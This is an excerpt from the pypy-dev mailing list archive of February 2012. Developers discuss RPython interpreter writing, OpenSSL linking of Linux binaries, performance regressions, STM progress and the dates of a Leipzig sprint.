Of course, I share the same concerns as you about the standard library issue (although your body of work on the issue gives you a much better understanding of all the concerns, which at the moment I can only guess), so I was planning on starting with a very simple dummy interpreter and then build on top of that more features as time and skill allow. I will try to check your clojure implementation this weekend. Hopefully I will manage to do something useful :) A more generally targeted question, besides the sample RPython tutorial for brainfuck, what are the recommended readings (parts of the pypy code, papers, etc), tools and/or magic for working in RPython on an interpreter? I saw that there will be a sprint soon in Berlin (and it not being that far from Prague, if the dates allow, it might be possible for me to take some vacation days and assist). In regards to that, having only experience with python and almost none in interpreter writing, will my presence there be of any value? I can imagine that you must want to do a lot of work in such an event and that a newbie like me might not be the thing to have around. Thus, I would like to ask if with the readings that I ask in the previous paragraph there would be some easy task that I could work on to get acquainted with the software and assist another future sprint. Best regards, Antoni Segura Puimedon On Fri, Feb 17, 2012 at 3:18 PM, Timothy Baldridge wrote: > Oh yeah, I forgot. The other nice thing about doing clojure-py in > Python is that I should be able to write RPython code in Clojure. Lisp > macros FTW! > > Timothy > > > -- > "One of the main causes of the fall of the Roman Empire was > that--lacking zero--they had no way to indicate successful termination > of their C programs."
> (Robert Firth) > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > -------------- next part -------------- An HTML attachment was scrubbed... URL: From santagada at gmail.com Fri Feb 17 15:55:14 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Fri, 17 Feb 2012 12:55:14 -0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Tue, Feb 14, 2012 at 7:45 AM, Maciej Fijalkowski wrote: > It's not PyPy requirement, it's the binary requirement. To be honest, > binary distribution on linux is a major mess. Fortunately for most > popular distributions there is a better or worse source of official or > semi-official way to get it directly from the distribution and that's > a recommended way (fedora, ubuntu, debian, gentoo and arch package > pypy). why not statically link everything and mark the pre built binaries a "security risk" or whatever and then they will just work. -- Leonardo Santagada From tbaldridge at gmail.com Fri Feb 17 16:11:55 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 09:11:55 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: > A more generally targeted question, besides the sample rpython tutorial for > brainfuck, what are the recommended readings (parts of the pypy code, > papers, etc), tools and/or magic for working at rpython on an interpreter? Now, most of this code is more or less crap, but I do suggest taking a look at my first stab at a RPython interpreter for Clojure https://github.com/halgari/clj-pypy IIRC, the target compiled okay, and you could run the code in scratchspace.clj. Basically I got to the point where I realized that if I had lisp macros, I could write RPython code way faster.
Half of the structures in Clojure follow this pattern: class Foo(object): def __init__(self, foo, bar, baz): self.foo = foo self.bar = bar self.baz = baz def addBarBaz(self): return self.bar + self.baz I could write that for that, or, in Clojure I could write myself a macro and just do: (deftype Foo [foo bar baz] (addBarBaz [self] (+ bar baz))) So basically I've found that I can write the same code in the following languages with this line ratio: Clojure: 1 Python: 3 Java: 6 This is the reason I shelved the RPython idea. If I want to dramatically re-define how types are handled in Clojure-py all I have to do is re-write a single macro. "Why write a jit when you can have RPython do it for you?" "Why write a typesystem, when you can have Clojure macros do it for you?" Timothy -- "One of the main causes of the fall of the Roman Empire was that--lacking zero--they had no way to indicate successful termination of their C programs." (Robert Firth) From fijall at gmail.com Fri Feb 17 16:23:07 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 17:23:07 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 5:11 PM, Timothy Baldridge wrote: >> A more generally targeted question, besides the sample rpython tutorial for >> brainfuck, what are the recommended readings (parts of the pypy code, >> papers, etc), tools and/or magic for working at rpython on an interpreter? > > > Now, most of this code is more or less crap, but I do suggest taking a > look at my first stab at a RPython interpreter for Clojure > > https://github.com/halgari/clj-pypy > > > IIRC, the target compiled okay, and you could run the code in scratchspace.clj. > > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster. Half of the structures > in Clojure follow this pattern: > > class Foo(object): >
    def __init__(self, foo, bar, baz): >         self.foo = foo >         self.bar = bar >         self.baz = baz >     def addBarBaz(self): >         return self.bar + self.baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] >      (addBarBaz [self] (+ bar baz))) > Just a sidenote - RPython allows you to do metaprogramming. It's not as easy and pleasant, but you can generate code. In fact we do it all over the place in pypy either using string and exec() or closures that return slightly different classes for each set of given parameters. From celebdor at gmail.com Fri Feb 17 16:23:44 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 16:23:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 4:11 PM, Timothy Baldridge wrote: > > A more generally targeted question, besides the sample rpython tutorial > for > > brainfuck, what are the recommended readings (parts of the pypy code, > > papers, etc), tools and/or magic for working at rpython on an > interpreter? > > > Now, most of this code is more or less crap, but I do suggest taking a > look at my first stab at a RPython interpreter for Clojure > > https://github.com/halgari/clj-pypy > > > IIRC, the target compiled okay, and you could run the code in > scratchspace.clj. > > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster.
Half of the structures > in Clojure follow this pattern: > > class Foo(object): > def __init__(self, foo, bar, baz): > self.foo = foo > self.bar = bar > self.baz = baz > def addBarBaz(self): > return self.bar + self.baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] > (addBarBaz [self] (+ bar baz))) > So basically I've found that I can write the same code in the > following languages with this line ratio: > > Clojure: 1 > Python: 3 > Java: 6 > > This is the reason I shelved the RPython idea. If I want to > dramatically re-define how types are handled in Clojure-py all I have > to do is re-write a single macro. > > > > > "Why write a jit when you can have RPython do it for you?" > > "Why write a typesystem, when you can have Clojure macros do it for you?" > This would be the clojurescript approach, right? > > > > Timothy > > > > -- > "One of the main causes of the fall of the Roman Empire was > that--lacking zero--they had no way to indicate successful termination > of their C programs." > (Robert Firth) > -------------- next part -------------- An HTML attachment was scrubbed... URL: From amauryfa at gmail.com Fri Feb 17 16:24:24 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Fri, 17 Feb 2012 16:24:24 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: 2012/2/17 Timothy Baldridge > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster.
Half of the structures > in Clojure follow this pattern: > > class Foo(object): > def __init__(self, foo, bar, baz): > self.foo = foo > self.bar = bar > self.baz = baz > def addBarBaz(self): > return self.bar + self.baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] > (addBarBaz [self] (+ bar baz))) > Remember that RPython works with imported modules, on classes and functions in memory. You are free to use exec() or eval() to build code. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Fri Feb 17 16:25:18 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 17:25:18 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 5:23 PM, Maciej Fijalkowski wrote: > On Fri, Feb 17, 2012 at 5:11 PM, Timothy Baldridge wrote: >>> A more generally targeted question, besides the sample rpython tutorial for >>> brainfuck, what are the recommended readings (parts of the pypy code, >>> papers, etc), tools and/or magic for working at rpython on an interpreter? >> >> >> Now, most of this code is more or less crap, but I do suggest taking a >> look at my first stab at a RPython interpreter for Clojure >> >> https://github.com/halgari/clj-pypy >> >> >> IIRC, the target compiled okay, and you could run the code in scratchspace.clj. >> >> Basically I got to the point where I realized that if I had lisp >> macros, I could write RPython code way faster. Half of the structures >> in Clojure follow this pattern: >> >> class Foo(object): >>     def __init__(self, foo, bar, baz): >>         self.foo = foo >>         self.bar = bar >>         self.baz = baz >>     def addBarBaz(self): >>
return self.bar + self.baz >> >> I could write that for that, or, in Clojure I could write myself a >> macro and just do: >> >> (deftype Foo [foo bar baz] >>      (addBarBaz [self] (+ bar baz))) >> > > Just a sidenote - RPython allows you to do metaprogramming. It's not > as easy and pleasant, but you can generate code. In fact we do it all > over the place in pypy either using string and exec() or closures that > return slightly different classes for each set of given parameters. To go even further - you can do whatever you like that ends up with living python objects. Then they can be compiled as RPython. If you feel like bootstrapping by having pieces compiled to RPython then it's all good. From arigo at tunes.org Fri Feb 17 18:23:46 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:23:46 +0100 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: Hi Leonardo, On Fri, Feb 17, 2012 at 15:55, Leonardo Santagada wrote: > why not statically link everything and mark the pre built binaries a > "security risk" or whatever and then they will just work. Anyone can either install PyPy from his own distribution, or translate it from sources; or attempt to get one of our nightly binary packages, which may or may not work because it's Linux. I think that this is what you get on Linux, and we will not try to find obscure workarounds (like making all our nightly binary packages twice as big just for this use case). A bientôt, Armin.
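The string-plus-exec() technique that fijal and Amaury describe earlier in this thread can be sketched in plain Python as follows. The make_struct helper is hypothetical, not an actual PyPy API; it only illustrates generating the repetitive Foo-style boilerplate at import time:

```python
def make_struct(name, fields):
    # Generate ordinary class source and exec() it at import time.
    # By the time RPython translation runs, the result is just a
    # plain live class, like any hand-written one.
    lines = ["class %s(object):" % name,
             "    def __init__(self, %s):" % ", ".join(fields)]
    for f in fields:
        lines.append("        self.%s = %s" % (f, f))
    namespace = {}
    exec("\n".join(lines), namespace)
    return namespace[name]

# One call replaces the repeated __init__ boilerplate shown above.
Foo = make_struct("Foo", ["foo", "bar", "baz"])
```

The same effect can also be had with closures that return a freshly built class per parameter set, which is the other idiom fijal mentions.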
From arigo at tunes.org Fri Feb 17 18:28:37 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:28:37 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: Message-ID: Hi Timothy, On Fri, Feb 17, 2012 at 14:03, Timothy Baldridge wrote: > In general, I've been very impressed with > the performance of pypy, but this factorial program takes about 2x > longer to complete than the same routine running on CPython. It's factorial(), so it's handling large "longs". So it's about 2x as slow as CPython. End of the story. Just to be sure, before digging into bytecodes you generate, try to compare the pure Python versions of factorial. The PyPy one is twice as slow as the CPython one because it's all about large "longs". A bientôt, Armin. From arigo at tunes.org Fri Feb 17 18:30:31 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:30:31 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: <4F3E5396.70705@gmail.com> References: <4F3E5396.70705@gmail.com> Message-ID: Hi Anto, On Fri, Feb 17, 2012 at 14:18, Antonio Cuni wrote: >>>>> def foo(x): > ....     return foo.__len__() How about "return len(foo)" instead? That's even more natural as Python code. But I guess anyway that all three solutions get JIT-compiled to basically the same thing. A bientôt, Armin. From santagada at gmail.com Fri Feb 17 18:33:45 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Fri, 17 Feb 2012 15:33:45 -0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Fri, Feb 17, 2012 at 3:23 PM, Armin Rigo wrote: > Hi Leonardo, > > On Fri, Feb 17, 2012 at 15:55, Leonardo Santagada wrote: >> why not statically link everything and mark the pre built binaries a >> "security risk" or whatever and then they will just work.
> > Anyone can either install PyPy from his own distribution, or translate > it from sources; or attempt to get one of our nightly binary packages, > which may or may not work because it's Linux. I think that this is > what you get on Linux, and we will not try to find obscure workarounds > (like making all our nightly binary packages twice as big just for > this use case). it would also make testing old nightly builds much easier, as they will just work on any machine with any openssl. Another option would be to do a semi-source distro, shipping the resulting C files and the makefile, so people would still need to compile the sources but it would link to the openssl lib they have available -- or are the C files too specific for that to work? Is static linking really obscure? Just use xz instead of gz to compress the binaries and you will probably get most of the space back. It is far easier to find an xz binary than to find a machine with +/- 2 hours and 4gb of ram to build a pypy from source. -- Leonardo Santagada From arigo at tunes.org Fri Feb 17 18:38:32 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:38:32 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Antoni, On Fri, Feb 17, 2012 at 15:51, Antoni Segura Puimedon wrote: > I saw that there will be a sprint soon in Berlin (and it not being that far > from Prague, if the dates allow, it might be possible for me to take some > vacation days and assist). You are most welcome to our sprints. No previous experience is needed, although as you say, it's useful if you have previously read about or done something about some part of PyPy; or at least have good Python knowledge. We are planning so far to have a sprint not in Berlin (unless I missed this one), but in Leipzig, Germany, near the end of June. A bientôt, Armin.
From celebdor at gmail.com Fri Feb 17 18:49:44 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 18:49:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Armin, Thanks a lot for welcoming me to the sprint. Leipzig sounds even better for coming from Prague. In the end of June I am organizing a biggish LAN party near Barcelona, so I don't know if I will be able to come, but if there is a chance I will surely come. Any suggestion on where to start reading pypy code/material? Antoni Segura Puimedon PS: I'm curious about the regularity and the location choice of the PyPy team, how does it usually work? On Fri, Feb 17, 2012 at 6:38 PM, Armin Rigo wrote: > Hi Antoni, > > On Fri, Feb 17, 2012 at 15:51, Antoni Segura Puimedon > wrote: > > I saw that there will be a sprint soon in Berlin (and it not being that > far > > from Prague, if the dates allow, it might be possible for me to take some > > vacation days and assist). > > You are most welcome to our sprints. No previous experience is > needed, although as you say, it's useful if you have previously read > about or done something about some part of PyPy; or at least have good > Python knowledge. > > We are planning so far to have a sprint not in Berlin (unless I missed > this one), but in Leipzig, Germany, near the end of June. > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From tbaldridge at gmail.com Fri Feb 17 19:05:27 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:05:27 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: >It's factorial(), so it's handling large "longs". ?So it's about 2x as >slow as CPython. ?End of the story. 
Funny enough, had just thought of that and given it a try. I switched it to calculating (fact 20) and (times 200000) and PyPy is now 3x faster than CPython. Thanks for the help! Timothy From tbaldridge at gmail.com Fri Feb 17 19:16:47 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:16:47 -0600 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: >> Anyone can either install PyPy from his own distribution, or translate >> it from sources; or attempt to get one of our nightly binary packages, >> which may or may not work because it's Linux. I think that this is >> what you get on Linux, and we will not try to find obscure workarounds >> (like making all our nightly binary packages twice as big just for >> this use case). Or you can just do what I did. Find an old package for your linux system and install that. On my Ubuntu box v11.10, I simply found an old openssl-0.9.8o.deb that was meant for version 10.x. The deps on the package stated something like: libc >= 2.4.3 So it just installed and ran fine. PyPy is now happily running on my machine. Timothy From laurentvaucher at gmail.com Fri Feb 17 19:23:15 2012 From: laurentvaucher at gmail.com (Laurent Vaucher) Date: Fri, 17 Feb 2012 19:23:15 +0100 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case Message-ID: Sorry to repost, but does anyone have an idea about what I could do to track down the source of the slowdown? Should I run with some trace to try to compare how different parts behave? How could I do that? Thanks, Laurent. Hi and first of all, thanks for that great project. Now to my "problem". I'm doing some puzzle-solving, constraint processing with Python and on my particular program, PyPy 1.8 showed a 50% increase in running time over PyPy 1.7. I'm not doing anything fancy (no numpy, itertools, etc.).
The program is here: https://github.com/slowfrog/hexiom To reproduce: - fetch hexiom2.py and level36.txt from github - run 'pypy hexiom2.py -sfirst level36.txt' On my machine (Windows 7) the timings are the following: Python 2.6.5/Windows 32 3m35s Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) [PyPy 1.7.0 with MSC v.1500 32 bit] 31s Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) [PyPy 1.8.0 with MSC v.1500 32 bit] 48s I'm using the default options. Do you have any idea what could be causing that? Thanks, Laurent. -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Fri Feb 17 19:31:47 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:31:47 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi all, A negative update regarding HTM: from some sources, we can do the educated guess that Intel's Haswell processor, released in 2013, will have HTM --- at the level of the processor's L1 cache. That means that just a few kilobytes of memory can be part of a transaction's read/write set. Moreover there is no mechanism to tell the cpu "this read/write needs not be tracked", so it has to record everything in these few kilobytes. So, bad news: it's very unlikely to be of any use at all for the large-scale transactions I'm playing with. A bientôt, Armin. From fijall at gmail.com Fri Feb 17 19:38:17 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 20:38:17 +0200 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 8:23 PM, Laurent Vaucher wrote: > > Sorry to repost, but does anyone have an idea about what I could do to track > down the source of the slowdown? Should I run with some trace to try to > compare how different parts behave? How could I do that? > > Thanks, > Laurent. Hi Laurent.
Good starting points: * run stuff with cProfile and compare * run stuff with valgrind and compare * compare traces * run PYPYLOG=log pypy and then analyze output using pypy/tool/logparser.py I'm sorry we did not get back to you, but we're quite busy. Thanks! fijal > > Hi and first of all, thanks for that great project. > Now to my "problem". I'm doing some puzzle-solving, constraint processing > with Python and on my particular program, PyPy 1.8 showed a 50% increase in > running time over PyPy 1.7. I'm not doing anything fancy (no numpy, > itertools, etc.). > > The program is here: https://github.com/slowfrog/hexiom > To reproduce: > - fetch hexiom2.py and level36.txt from github > - run 'pypy hexiom2.py -sfirst level36.txt' > On my machine (Windows 7) the timings are the following: > > Python 2.6.5/Windows 32 > 3m35s > > Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) > [PyPy 1.7.0 with MSC v.1500 32 bit] > 31s > > Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) > [PyPy 1.8.0 with MSC v.1500 32 bit] > 48s > > I'm using the default options. > Do you have any idea what could be causing that? > Thanks, > Laurent. > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > From tbaldridge at gmail.com Fri Feb 17 19:39:24 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:39:24 -0600 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: >"this read/write need not be tracked", so it has to record everything in > these few kilobytes. On that subject, how do I do this in the pypy STM? From what I understand, all reads/writes inside a transaction.add() function are tracked, and the entire function is restarted if anything fails. However, there are many times that I really don't care if some global config variable has been updated, so there's really no use in tracking changes to it. How do we let the STM engine know of this?
Timothy From arigo at tunes.org Fri Feb 17 19:47:59 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:47:59 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Timothy, On Fri, Feb 17, 2012 at 19:39, Timothy Baldridge wrote: > On that subject, how do I do this in the pypy STM? You can't. Every change is tracked, at the level of Python. If you don't want that, it would require answering careful language-design questions; I'll leave these for later. The reason I'm bringing this forward is that, for example, any Python code typically allocates and forgets tons of objects. We would like to tell the hardware "don't track this, it's a just-allocated object --- so if you roll back the whole transaction, you don't need to restore what was there". But we can't, with the 2013 version of Intel's HTM. This alone means that the hardware would track at least 10 times more memory than really needed. A bientôt, Armin. From arigo at tunes.org Fri Feb 17 19:50:43 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:50:43 +0100 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case In-Reply-To: References: Message-ID: Hi Laurent, On Fri, Feb 17, 2012 at 19:23, Laurent Vaucher wrote: > Sorry to repost, but does anyone have an idea about what I could do to track > down the source of the slowdown? We're busy, as Fijal said, but your issue is not forgotten. I have already filed it here: https://bugs.pypy.org/issue1051 A bientôt, Armin. From mmueller at python-academy.de Fri Feb 17 20:13:55 2012 From: mmueller at python-academy.de (Mike Müller) Date: Fri, 17 Feb 2012 20:13:55 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany?
In-Reply-To: <4F3D90DD.2010804@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: <4F3EA6F3.4090606@python-academy.de> On 17.02.12 00:27, Antonio Cuni wrote: > On 02/16/2012 10:17 PM, Armin Rigo wrote: >> Hi Mike, >> >> On Thu, Feb 16, 2012 at 22:07, Mike Müller wrote: >>> We can move the date. One week or only a few days? Like 22nd till 27th >>> of June would put four days in between the sprint and EP. >> >> That would work too. Antonio, would such dates let you come to >> Leipzig for at least most of the sprint, or should we say "too bad" >> for you? > > yes, those dates might work for me. > However, I'd prefer not to do any promise, so if people prefer to do 25-30, > then too bad for me. > > Just pick the period that you prefer, and then if I manage I'll be glad to come. Do you want to run a Doodle on it, or are we close enough to an agreement on the dates? ;) So is it June 22-27, 2012, or do we still need to shift? Cheers, Mike From stefan_ml at behnel.de Fri Feb 17 20:16:35 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 17 Feb 2012 20:16:35 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany?
In-Reply-To: <4F3D90DD.2010804@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: Antonio Cuni, 17.02.2012 00:27: > On 02/16/2012 10:17 PM, Armin Rigo wrote: >> On Thu, Feb 16, 2012 at 22:07, Mike Müller wrote: >>> We can move the date. One week or only a few days? Like 22nd till 27th >>> of June would put four days in between the sprint and EP. >> >> That would work too. Antonio, would such dates let you come to >> Leipzig for at least most of the sprint, or should we say "too bad" >> for you? > > yes, those dates might work for me. > However, I'd prefer not to do any promise, so if people prefer to do 25-30, > then too bad for me. > > Just pick the period that you prefer, and then if I manage I'll be glad to > come. Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a Cython course). I don't know if the week after that suits *anyone* (including Mike), but if you could move the sprint another week earlier, I'd arrange to stay for the week-end (16/17th) and we could discuss Cython/PyPy integration topics there. Stefan From andrewfr_ice at yahoo.com Fri Feb 17 20:26:19 2012 From: andrewfr_ice at yahoo.com (Andrew Francis) Date: Fri, 17 Feb 2012 11:26:19 -0800 (PST) Subject: [pypy-dev] Questions Re: STM status In-Reply-To: References: Message-ID: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> Hi Armin: ________________________________ From: Armin Rigo To: PyPy Developer Mailing List Sent: Thursday, February 16, 2012 3:58 PM Subject: [pypy-dev] STM status >An update for STM: today I managed to build a pypy using the new "stm >gc".
It runs richards.py on tannit: >in 1 thread: 2320 ms per iteration >in 2 threads: 1410 ms per iteration >in 4 threads: 785 ms per iteration >in 8 threads: 685 ms per iteration >The small gap between 4 and 8 threads is due to tannit having only 4 >"real" cpus, each one hyperthreaded. The additional gain is thus >smaller than expected. This is really exciting stuff. As always I have a few questions. 1) I have been looking at the transaction module and its dependent modules. In rstm.perform_transaction, I see a comment to a "custom GIL." So the GIL is still there? Or will it be eventually removed? 2) I have glanced over the transaction and rstm module (it would help if I understood PyPy's architecture better but I am working on that). I figured it would be best to focus on translator.transform.py and translator.llstminterp.py first to understand what is happening at a high level. I admit I am not comfortable with reading the code. However I see places where the code distinguishes between mutable and immutable, local and non-local variables. I will assume mutable and non-local variables will be the subject of transactional memory. Although the STM implementation will be transparent to the programmer (there is only transaction.run() and transaction.add() available to the programmer), can I assume that one can "help" the STM if a) somehow more variables can be marked as immutable? 2)"Threads of execution" do not share state. Essentially a more functional programming approach. Or am I reading too much into this? 3) Could the stackless module work with STM? Cheers, Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Fri Feb 17 20:26:46 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 21:26:46 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany?
In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: > Antonio Cuni, 17.02.2012 00:27: >> On 02/16/2012 10:17 PM, Armin Rigo wrote: >>> On Thu, Feb 16, 2012 at 22:07, Mike Müller wrote: >>>> We can move the date. One week or only a few days? Like 22nd till 27th >>>> of June would put four days in between the sprint and EP. >>> >>> That would work too. Antonio, would such dates let you come to >>> Leipzig for at least most of the sprint, or should we say "too bad" >>> for you? >> >> yes, those dates might work for me. >> However, I'd prefer not to do any promise, so if people prefer to do 25-30, >> then too bad for me. >> >> Just pick the period that you prefer, and then if I manage I'll be glad to >> come. > > Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a > Cython course). I don't know if the week after that suits *anyone* > (including Mike), but if you could move the sprint another week earlier, > I'd arrange to stay for the week-end (16/17th) and we could discuss > Cython/PyPy integration topics there. > > Stefan I'm afraid I can't make it that early :( Since my home base is Cape Town, travelling back and forth for 10 days just does not make any sense. 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 including weekends) sounds very good to me. Cheers, fijal From mmueller at python-academy.de Fri Feb 17 21:05:36 2012 From: mmueller at python-academy.de (Mike Müller) Date: Fri, 17 Feb 2012 21:05:36 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany?
In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: <4F3EB310.5090208@python-academy.de> On 17.02.12 20:26, Maciej Fijalkowski wrote: > On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >> Antonio Cuni, 17.02.2012 00:27: >>> On 02/16/2012 10:17 PM, Armin Rigo wrote: >>>> On Thu, Feb 16, 2012 at 22:07, Mike Müller wrote: >>>>> We can move the date. One week or only a few days? Like 22nd till 27th >>>>> of June would put four days in between the sprint and EP. >>>> >>>> That would work too. Antonio, would such dates let you come to >>>> Leipzig for at least most of the sprint, or should we say "too bad" >>>> for you? >>> >>> yes, those dates might work for me. >>> However, I'd prefer not to do any promise, so if people prefer to do 25-30, >>> then too bad for me. >>> >>> Just pick the period that you prefer, and then if I manage I'll be glad to >>> come. >> >> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >> Cython course). I don't know if the week after that suits *anyone* >> (including Mike), but if you could move the sprint another week earlier, >> I'd arrange to stay for the week-end (16/17th) and we could discuss >> Cython/PyPy integration topics there. This week is still available. >> >> Stefan > > I'm afraid I can't make it that early :( Since my home base is cape > town travelling back and forth for 10 days just does not make any > sense. > > 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 > including weekends) sounds very good to me. I think the one with the longest traveling distance should get the highest priority, which puts 22-27 into the pole position. Stefan: How about coming to Leipzig again?
